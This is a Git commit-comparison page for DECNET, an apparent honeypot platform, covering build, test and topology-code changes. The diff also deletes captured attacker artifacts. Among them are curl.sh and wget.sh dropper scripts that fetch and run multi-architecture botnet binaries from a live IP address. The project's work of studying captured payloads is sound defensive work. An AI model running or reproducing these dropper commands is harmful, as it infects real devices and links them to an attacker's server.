Compare commits

3 Commits

Author SHA1 Message Date
DECNET CI
b12d46ff9d ci: auto-merge dev → testing
Some checks failed
CI / Lint (ruff) (push) Has been skipped
CI / SAST (bandit) (push) Has been skipped
CI / Dependency audit (pip-audit) (push) Has been skipped
CI / Merge dev → testing (push) Has been skipped
CI / Test (Standard) (3.11) (push) Successful in 13m19s
CI / Test (Live) (3.11) (push) Successful in 1m17s
CI / Merge testing → main (push) Failing after 11s
2026-04-28 22:17:36 +00:00
DECNET CI
2ce076cd37 ci: auto-merge dev → testing [skip ci] 2026-04-28 22:03:20 +00:00
DECNET CI
e8d97281f7 ci: auto-merge dev → testing [skip ci] 2026-04-20 20:39:35 +00:00
963 changed files with 9226 additions and 93453 deletions

19
.gitignore vendored
View File

@@ -51,22 +51,3 @@ schem
# pydeps-style dependency graph dumps from local analysis runs.
deps.txt
# Node modules vendored under decnet/canary/ for the obfuscator helper.
# The package.json is the source of truth; modules are reinstalled at
# build/deploy time.
node_modules/
package-lock.json
# TTP rule-precision corpus pulled from prod sqlite. Real attacker
# payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
# files alongside ARE committed and exercise the harness in CI.
tests/ttp/rule_precision/corpus/*.jsonl
tests/ttp/rule_precision/corpus/seed_*.jsonl
threatfox-api.json
# MITRE ATT&CK STIX bundle — 50 MB, fetched at runtime via attack_stix.py
enterprise-attack-*.json
# pytest failure dump files
testfail

219
Makefile
View File

@@ -1,219 +0,0 @@
PYTEST := .311/bin/pytest
FAIL_FAST ?= 1
ARGS :=
# addopts in pyproject.toml already provides -v -q -x -n 4 --dist load.
# Unit suites inherit that; special suites clear it with --override-ini.
UNIT_FLAGS := --timeout=30 --timeout-method=thread
SEQ_FLAGS := --override-ini="addopts=-v -x" -n logical --timeout=120 --timeout-method=thread
FUZZ_FLAGS := --override-ini="addopts=-v -x" -n logical -m fuzz \
--ignore=tests/api/test_schemathesis.py \
--ignore=tests/api/test_schemathesis_agent.py \
--ignore=tests/api/test_schemathesis_swarm.py \
--ignore=tests/api/test_schemathesis_ttp.py
SCHEMA_QUICK ?= 0
SCHEMA_FLAGS := --override-ini="addopts=-v -x" -n 4 -m fuzz --timeout=600 --timeout-method=thread
BENCH_FLAGS := --override-ini="addopts=-v" -p no:xdist --benchmark-only -m bench
# ── Unit suites (xdist, 30s timeout) ─────────────────────────────────────────
.PHONY: test-core
test-core:
$(PYTEST) tests/core tests/config tests/factories tests/fixtures $(UNIT_FLAGS) $(ARGS)
.PHONY: test-web
test-web:
$(PYTEST) tests/web tests/services $(UNIT_FLAGS) $(ARGS)
.PHONY: test-db
test-db:
$(PYTEST) tests/db tests/vectorstore $(UNIT_FLAGS) $(ARGS)
.PHONY: test-bus
test-bus:
$(PYTEST) tests/bus tests/logging tests/telemetry $(UNIT_FLAGS) $(ARGS)
.PHONY: test-ttp
test-ttp:
$(PYTEST) tests/ttp $(UNIT_FLAGS) $(ARGS)
.PHONY: test-intel
test-intel:
$(PYTEST) tests/intel tests/asn tests/geoip $(UNIT_FLAGS) $(ARGS)
.PHONY: test-analysis
test-analysis:
$(PYTEST) tests/clustering tests/correlation $(UNIT_FLAGS) $(ARGS)
.PHONY: test-infra
test-infra:
$(PYTEST) tests/agent tests/collector tests/sniffer tests/profiler $(UNIT_FLAGS) $(ARGS)
.PHONY: test-fleet
test-fleet:
$(PYTEST) tests/fleet tests/swarm tests/topology tests/orchestrator tests/deploy tests/updater $(UNIT_FLAGS) $(ARGS)
.PHONY: test-cli
test-cli:
$(PYTEST) tests/cli tests/engine tests/mutator tests/realism $(UNIT_FLAGS) $(ARGS)
.PHONY: test-features
test-features:
$(PYTEST) tests/canary tests/artifacts tests/webhook tests/decky_io tests/prober $(UNIT_FLAGS) $(ARGS)
# ── Go and React suites ───────────────────────────────────────────────────────
_GO_MODULES := \
decnet/templates/_caddy_modules/decnetfp \
decnet/templates/http/_caddy_modules/decnetfp \
decnet/templates/https/_caddy_modules/decnetfp
.PHONY: test-go
test-go:
@failed=""; \
for mod in $(_GO_MODULES); do \
echo "=== go test: $$mod ==="; \
if (cd "$$mod" && go test ./...); then \
echo "[PASS] $$mod"; \
else \
echo "[FAIL] $$mod"; \
failed="$$failed $$mod"; \
if [ "$(FAIL_FAST)" = "1" ]; then exit 1; fi; \
fi; \
done; \
[ -z "$$failed" ]
.PHONY: test-react
test-react:
cd decnet_web && npm run test:run $(ARGS)
# ── Special suites (sequential, longer timeout) ───────────────────────────────
.PHONY: test-live
test-live:
$(PYTEST) tests/live -m live $(SEQ_FLAGS) $(ARGS)
.PHONY: test-api
test-api:
$(PYTEST) tests/api $(SEQ_FLAGS) $(ARGS)
.PHONY: test-stress
test-stress:
$(PYTEST) tests/stress -m stress $(SEQ_FLAGS) $(ARGS)
.PHONY: test-service
test-service:
$(PYTEST) tests/service_testing $(SEQ_FLAGS) $(ARGS)
.PHONY: test-fuzz
test-fuzz:
$(PYTEST) $(FUZZ_FLAGS) $(ARGS)
.PHONY: test-schema
test-schema:
SCHEMA_QUICK=$(SCHEMA_QUICK) $(PYTEST) \
tests/api/test_schemathesis.py \
tests/api/test_schemathesis_agent.py \
tests/api/test_schemathesis_swarm.py \
tests/api/test_schemathesis_ttp.py \
$(SCHEMA_FLAGS) $(ARGS)
.PHONY: test-bench
test-bench:
$(PYTEST) tests/perf $(BENCH_FLAGS) $(ARGS)
.PHONY: test-docker
test-docker:
DECNET_LIVE_DOCKER=1 $(PYTEST) tests/docker -m docker $(SEQ_FLAGS) $(ARGS)
# ── Static analysis ───────────────────────────────────────────────────────────
.PHONY: test-mypy
test-mypy:
.311/bin/mypy decnet --ignore-missing-imports --no-error-summary
.PHONY: test-bandit
test-bandit:
.311/bin/bandit -r decnet -c pyproject.toml
.PHONY: test-vulture
test-vulture:
.311/bin/vulture decnet --min-confidence 80
.PHONY: test-pip-audit
test-pip-audit:
.311/bin/pip-audit
# ── Composite: all suites ─────────────────────────────────────────────────────
_ALL_SUITES := core web db bus ttp intel analysis infra fleet cli features \
go react \
live api schema stress service fuzz bench docker \
mypy bandit vulture pip-audit
.PHONY: test-all test
test-all test:
@failed=""; \
for suite in $(_ALL_SUITES); do \
echo ""; \
echo "══════════════════════════ $$suite ══════════════════════════"; \
if $(MAKE) --no-print-directory test-$$suite ARGS="$(ARGS)"; then \
echo "[PASS] $$suite"; \
else \
echo "[FAIL] $$suite"; \
failed="$$failed $$suite"; \
if [ "$(FAIL_FAST)" = "1" ]; then \
echo "Stopping at first failure. Use FAIL_FAST=0 to run all suites."; \
exit 1; \
fi; \
fi; \
done; \
if [ -n "$$failed" ]; then \
echo ""; \
echo "Failed:$$failed"; \
exit 1; \
fi; \
echo ""; \
echo "All suites passed."
.PHONY: help
help:
@echo "Unit suites (xdist, 30s timeout):"
@echo " make test-core tests/core + config + factories + fixtures"
@echo " make test-web tests/web + services"
@echo " make test-db tests/db + vectorstore"
@echo " make test-bus tests/bus + logging + telemetry"
@echo " make test-ttp tests/ttp"
@echo " make test-intel tests/intel + asn + geoip"
@echo " make test-analysis tests/clustering + correlation"
@echo " make test-infra tests/agent + collector + sniffer + profiler"
@echo " make test-fleet tests/fleet + swarm + topology + orchestrator + deploy + updater"
@echo " make test-cli tests/cli + engine + mutator + realism"
@echo " make test-features tests/canary + artifacts + webhook + decky_io + prober"
@echo ""
@echo "Go / React suites:"
@echo " make test-go go test ./... in each Caddy module variant"
@echo " make test-react vitest run in decnet_web"
@echo ""
@echo "Special suites (sequential, 120s timeout):"
@echo " make test-live tests/live"
@echo " make test-api tests/api (schemathesis)"
@echo " make test-stress tests/stress"
@echo " make test-service tests/service_testing"
@echo " make test-schema schemathesis contract tests (-m fuzz, xdist logical)"
@echo " make test-schema SCHEMA_QUICK=1 same, capped at 100 examples per test"
@echo " make test-fuzz hypothesis fuzz (all normal dirs, -m fuzz, skips schemathesis files)"
@echo " make test-bench tests/perf"
@echo " make test-docker tests/docker (needs DECNET_LIVE_DOCKER=1)"
@echo ""
@echo "Static analysis:"
@echo " make test-mypy mypy type check on decnet/"
@echo " make test-bandit bandit security scan on decnet/"
@echo " make test-vulture vulture dead code scan (>=80% confidence)"
@echo " make test-pip-audit pip-audit dependency vulnerability scan"
@echo ""
@echo "Composites:"
@echo " make test-all ALL suites (unit + go + react + live + api + schema + fuzz + bench + stress + docker + static analysis)"
@echo " make test-all FAIL_FAST=0 same, report all failures instead of stopping"
@echo ""
@echo "Passthrough: make test-web ARGS='--lf -s'"

View File

@@ -182,7 +182,6 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre
| Slug | Services | OS Fingerprint | Description |
|---|---|---|---|
| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
| `windows-server` | smb, rdp, ldap | windows | Windows domain member |
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
@@ -273,11 +272,6 @@ List live at any time with `decnet services`.
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
```ini
[deaddeck-1]
amount=1
archetype=deaddeck
ssh.password=admin
[decky-webmail.http]
server_header = Apache/2.4.54 (Debian)
fake_app = wordpress

View File

@@ -1,3 +0,0 @@
[0] Downloading 'http://31.56.209.39/curl.sh' ...
Saving 'curl.sh.1'
HTTP response 200 OK [http://31.56.209.39/curl.sh]

View File

@@ -1,46 +0,0 @@
#!/bin/sh
ulimit -n 4096
ulimit -n 999999
ulimit -v 2097152
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
rm -rf odin*
rm -rf bizy*
rm -rf rs*
rm -rf *.sh
#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64

View File

@@ -1,3 +0,0 @@
wget http://31.56.209.39/wget.sh -o wget.sh
wget http://31.56.209.39/curl.sh -o curl.sh

View File

@@ -1,3 +0,0 @@
[0] Downloading 'http://31.56.209.39/wget.sh' ...
Saving 'wget.sh.1'
HTTP response 200 OK [http://31.56.209.39/wget.sh]

View File

@@ -1,46 +0,0 @@
#!/bin/sh
ulimit -n 4096
ulimit -n 999999
ulimit -v 2097152
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
rm -rf odin*
rm -rf bizy*
rm -rf rs*
rm -rf *.sh
wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64

View File

View File

@@ -1,5 +0,0 @@
# bait/
Default operator-supplied email seed for IMAP/POP3 deckies. Drop `*.eml` and/or `*.json` files here; the IMAP/POP3 services bind-mount this dir read-only at `/var/spool/decnet-emails/seed` when no per-decky `email_seed` is configured. Entries concatenate onto the hardcoded bait baseline (additive to realism-engine output, never replacing).
JSON shape: list of dicts with required `from_addr`, `to_addr`, `subject`, `body`; optional `from_name`, `date`, `flags`. See `decnet/templates/imap/server.py` for the loader.

Binary file not shown.

View File

@@ -194,7 +194,7 @@ async def self_destruct() -> None:
argv = ["/bin/bash", path]
spawn_kwargs = {"start_new_session": True}
subprocess.Popen( # type: ignore[call-overload] # nosec B603
subprocess.Popen( # nosec B603
argv,
stdin=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,

View File

@@ -121,7 +121,7 @@ def start() -> Optional[asyncio.Task]:
return None
try:
from decnet import __version__ as _v # type: ignore[attr-defined]
from decnet import __version__ as _v
agent_version = _v
except Exception:
agent_version = "unknown"

View File

@@ -59,73 +59,6 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
return str(tid)
def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
"""Verify hash integrity and structural validity; return topology_id."""
local_hash = canonical_hash(hydrated)
if local_hash != version_hash:
raise HashMismatch(
f"master hash {version_hash!r} does not match agent hash "
f"{local_hash!r} — refusing to apply"
)
issues = _validate_topology(hydrated)
if _validation_errors(issues):
raise ValidationError(issues)
return _topology_id(hydrated)
async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
"""Tear down the current topology if it differs from topology_id.
Master is authoritative — a different pinned topology (fully applied,
partially applied, or drifted) is torn down before the new apply proceeds.
Refusing with 409 would leave the agent stuck in a state only a human
could resolve.
"""
existing = store.current()
if existing is None or existing.topology_id == topology_id:
return
log.info(
"superseding topology %s with %s on master authority",
existing.topology_id, topology_id,
)
try:
await teardown(existing.topology_id, store)
except Exception as exc: # noqa: BLE001 — we still want to try applying
log.warning(
"best-effort teardown of superseded topology %s failed: %s",
existing.topology_id, exc,
)
# Hard-clear the store row so the new apply isn't blocked by a
# half-torn-down predecessor. Leftover docker objects surface via
# the next heartbeat's observed block.
store.clear(existing.topology_id)
def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
"""Create bridge networks, write compose file, and bring up containers.
Sync/blocking — callers must dispatch via asyncio.to_thread.
``--always-recreate-deps`` keeps service containers' netns shares
fresh: every decky service joins its base's netns via
``network_mode: container:<base>``, and that share is bound at
service start time. If a base is recreated (e.g. when ``ports:``
changes after toggling ``forwards_l3``) but compose decides the
services are unchanged, the services keep a stale netns FD
pointing at the destroyed base — they end up in an empty
namespace with only ``lo``, and external traffic hits a closed
port on the live base. Forcing dependents to recreate alongside
the base is the cheapest way to make this race impossible.
"""
compose_path = _topology_compose_path(topology_id)
client = docker.from_env()
for lan in hydrated["lans"]:
net_name = _topology_network_name(topology_id, lan["name"])
create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"])
write_topology_compose(hydrated, compose_path)
_compose_with_retry("up", "--build", "-d", "--always-recreate-deps", compose_file=compose_path)
async def apply(
hydrated: dict[str, Any],
version_hash: str,
@@ -140,11 +73,76 @@ async def apply(
Any docker / compose error propagates up; the endpoint maps it
to 500 and records the message on the store row.
"""
topology_id = _check_hash_and_validate(hydrated, version_hash)
await _teardown_superseded(topology_id, store)
await asyncio.to_thread(_materialise, hydrated, topology_id)
local_hash = canonical_hash(hydrated)
if local_hash != version_hash:
raise HashMismatch(
f"master hash {version_hash!r} does not match agent hash "
f"{local_hash!r} — refusing to apply"
)
issues = _validate_topology(hydrated)
if _validation_errors(issues):
raise ValidationError(issues)
topology_id = _topology_id(hydrated)
# Master is authoritative. If a different topology is pinned here
# — whether it fully applied, only partially applied (failure
# marker row + orphan containers), or drifted — teardown first,
# then accept the new one. Refusing with 409 would leave the
# agent stuck in a state only a human could resolve.
existing = store.current()
if existing is not None and existing.topology_id != topology_id:
log.info(
"superseding topology %s with %s on master authority",
existing.topology_id, topology_id,
)
try:
await teardown(existing.topology_id, store)
except Exception as exc: # noqa: BLE001 — we still want to try applying
log.warning(
"best-effort teardown of superseded topology %s failed: %s",
existing.topology_id, exc,
)
# Hard-clear the store row so the new apply isn't blocked
# by a half-torn-down predecessor. Leftover docker objects
# will surface via the next heartbeat's observed block.
store.clear(existing.topology_id)
lans = hydrated["lans"]
compose_path = _topology_compose_path(topology_id)
client = docker.from_env()
# Bridges + compose are sync/blocking; hop to a thread so we don't
# stall the event loop on a slow docker daemon.
def _materialise() -> None:
for lan in lans:
net_name = _topology_network_name(topology_id, lan["name"])
internal = not lan["is_dmz"]
create_bridge_network(
client, net_name, lan["subnet"], internal=internal
)
write_topology_compose(hydrated, compose_path)
# ``--always-recreate-deps`` keeps service containers' netns shares
# fresh: every decky service joins its base's netns via
# ``network_mode: container:<base>``, and that share is bound at
# service start time. If a base is recreated (e.g. when ``ports:``
# changes after toggling ``forwards_l3``) but compose decides the
# services are unchanged, the services keep a stale netns FD
# pointing at the destroyed base — they end up in an empty
# namespace with only ``lo``, and external traffic hits a closed
# port on the live base. Forcing dependents to recreate alongside
# the base is the cheapest way to make this race impossible.
_compose_with_retry(
"up", "--build", "-d", "--always-recreate-deps",
compose_file=compose_path,
)
await asyncio.to_thread(_materialise)
store.put(topology_id, version_hash, hydrated)
log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))
log.info(
"topology %s applied on agent (%d LANs)", topology_id, len(lans)
)
async def teardown(

View File

@@ -63,7 +63,6 @@ class TopologyStore:
# The agent is single-process, so there's no real contention —
# sqlite's own connection lock is enough.
self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
self._conn.row_factory = sqlite3.Row
self._conn.execute(
"CREATE TABLE IF NOT EXISTS applied_topology ("
" topology_id TEXT PRIMARY KEY,"
@@ -85,11 +84,11 @@ class TopologyStore:
if row is None:
return None
return AppliedRow(
topology_id=row["topology_id"],
applied_version_hash=row["applied_version_hash"],
hydrated=json.loads(row["hydrated_blob_json"]),
applied_at=int(row["applied_at"]),
last_error=row["last_error"],
topology_id=row[0],
applied_version_hash=row[1],
hydrated=json.loads(row[2]),
applied_at=int(row[3]),
last_error=row[4],
)
# ---------------------------------------------------------------- writes

View File

@@ -1 +0,0 @@
"""Artifact storage helpers shared between the web router and TTP workers."""

View File

@@ -1,86 +0,0 @@
"""
Shared on-disk artifact path resolution.
Honeypot decoys (SSH, SMTP) farm captured payloads into a host-mounted
quarantine tree:
/var/lib/decnet/artifacts/{decky}/{service}/{stored_as}
Two callers need to translate ``(decky, stored_as, service)`` into a
concrete ``Path`` rooted under that tree:
* The web router endpoint ``GET /api/v1/artifacts/{decky}/{stored_as}``
(``decnet.web.router.artifacts.api_get_artifact``) — admin-gated
download for the dashboard.
* The TTP ``EmailLifter`` (``decnet.ttp.impl.email_lifter``), which
reads the stored ``.eml`` at tag-time so body-aware predicates
(R0047 BEC, R0048 macro) don't need raw body text on the bus.
Both callers share the same validation rules and the same
defence-in-depth symlink-escape check; this module is the single
implementation. It is auth-agnostic — wrappers layer authentication
where appropriate (the router does ``require_admin``, the lifter does
not).
"""
from __future__ import annotations
import os
import re
from pathlib import Path
# decky names come from the deployer — lowercase alnum plus hyphens.
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
# Services that own an artifacts subdir. Kept explicit so a caller
# can't pivot into arbitrary subpaths via a query string or bus payload.
_ALLOWED_SERVICES = frozenset({"ssh", "smtp"})
# stored_as is assembled by the capturing template as:
# ${ts}_${sha:0:12}_${base}
# where ts is ISO-8601 UTC (e.g. 2026-04-18T02:22:56Z), sha is 12 hex chars,
# and base is the original filename's basename. Keep the filename charset
# tight but allow common punctuation dropped files actually use.
_STORED_AS_RE = re.compile(
r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z_[a-f0-9]{12}_[A-Za-z0-9._-]{1,255}$"
)
# Module-level so tests can monkeypatch. Override via env in production
# (the systemd unit sets this) — the prod path matches the bind mount
# declared in decnet/services/{ssh,smtp}.py.
ARTIFACTS_ROOT = Path(
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
)
class ArtifactPathError(ValueError):
"""Raised when (decky, stored_as, service) fails validation or escapes
the artifacts root.
The router catches this and re-raises HTTPException(400). The lifter
catches it and treats the event as having no body available (no-tag).
"""
def resolve_artifact_path(decky: str, stored_as: str, service: str) -> Path:
"""Validate inputs, resolve the on-disk path, and confirm it stays
inside the artifacts root.
Raises :class:`ArtifactPathError` on any violation. Does NOT check
that the file exists — callers handle that distinctly (404 for the
router, no-tag for the lifter).
"""
if service not in _ALLOWED_SERVICES:
raise ArtifactPathError("invalid service")
if not _DECKY_RE.fullmatch(decky):
raise ArtifactPathError("invalid decky name")
if not _STORED_AS_RE.fullmatch(stored_as):
raise ArtifactPathError("invalid stored_as")
root = ARTIFACTS_ROOT.resolve()
candidate = (root / decky / service / stored_as).resolve()
# defence-in-depth: even though the regexes reject `..`, make sure a
# symlink or weird filesystem state can't escape the root.
if root not in candidate.parents and candidate != root:
raise ArtifactPathError("path escapes artifacts root")
return candidate

View File

@@ -1,129 +0,0 @@
"""Shared asciinema shard helpers.
Extracted from ``decnet/web/router/transcripts/api_get_transcript.py``
so non-router callers (the BEHAVE-SHELL session-ended handler in
``decnet/profiler/worker.py``, the collector's session aggregator)
can resolve shard paths without crossing the layer boundary into the
FastAPI router.
Functions here speak in :class:`ValueError` — callers that want HTTP
semantics translate at the boundary. The router wrappers keep their
existing ``HTTPException`` behaviour for backwards compatibility.
PII boundary unchanged: shards live on disk; this module returns
:class:`pathlib.Path` pointers, never byte content. The ``_get_index``
cache stores byte offsets only.
"""
from __future__ import annotations
import os
import re
from collections import OrderedDict
from pathlib import Path
ARTIFACTS_ROOT = Path(
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts"),
)
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
_SERVICE_RE = re.compile(r"^(ssh|telnet)$")
_SHARD_BASENAME_RE = re.compile(r"^sessions-\d{4}-\d{2}-\d{2}\.jsonl$")
_SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')
# (path, mtime_ns) → {sid: [(offset, length), ...]}
_INDEX_CACHE: "OrderedDict[tuple[str, int], dict[str, list[tuple[int, int]]]]" = (
OrderedDict()
)
_CACHE_MAX = 32
def validate_names(decky: str, service: str) -> None:
"""Raise :class:`ValueError` if ``decky`` / ``service`` look forged."""
if not _DECKY_RE.fullmatch(decky):
raise ValueError(f"invalid decky name: {decky!r}")
if not _SERVICE_RE.fullmatch(service):
raise ValueError(f"invalid service: {service!r}")
def resolve_shard(decky: str, service: str, shard_name: str) -> Path:
"""Resolve ``ARTIFACTS_ROOT/{decky}/{service}/transcripts/{shard_name}``
with escape-attempt detection. Raises :class:`ValueError` on
invalid inputs.
"""
validate_names(decky, service)
if not _SHARD_BASENAME_RE.fullmatch(shard_name):
raise ValueError(f"invalid shard name: {shard_name!r}")
root = ARTIFACTS_ROOT.resolve()
candidate = (root / decky / service / "transcripts" / shard_name).resolve()
if root not in candidate.parents and candidate != root:
raise ValueError(f"path escapes artifacts root: {candidate}")
return candidate
def _build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
index: dict[str, list[tuple[int, int]]] = {}
with path.open("rb") as f:
offset = 0
for line in f:
length = len(line)
m = _SID_LINE_RE.search(line)
if m:
sid = m.group(1).decode("ascii")
index.setdefault(sid, []).append((offset, length))
offset += length
return index
def get_index(path: Path) -> tuple[dict[str, list[tuple[int, int]]], int]:
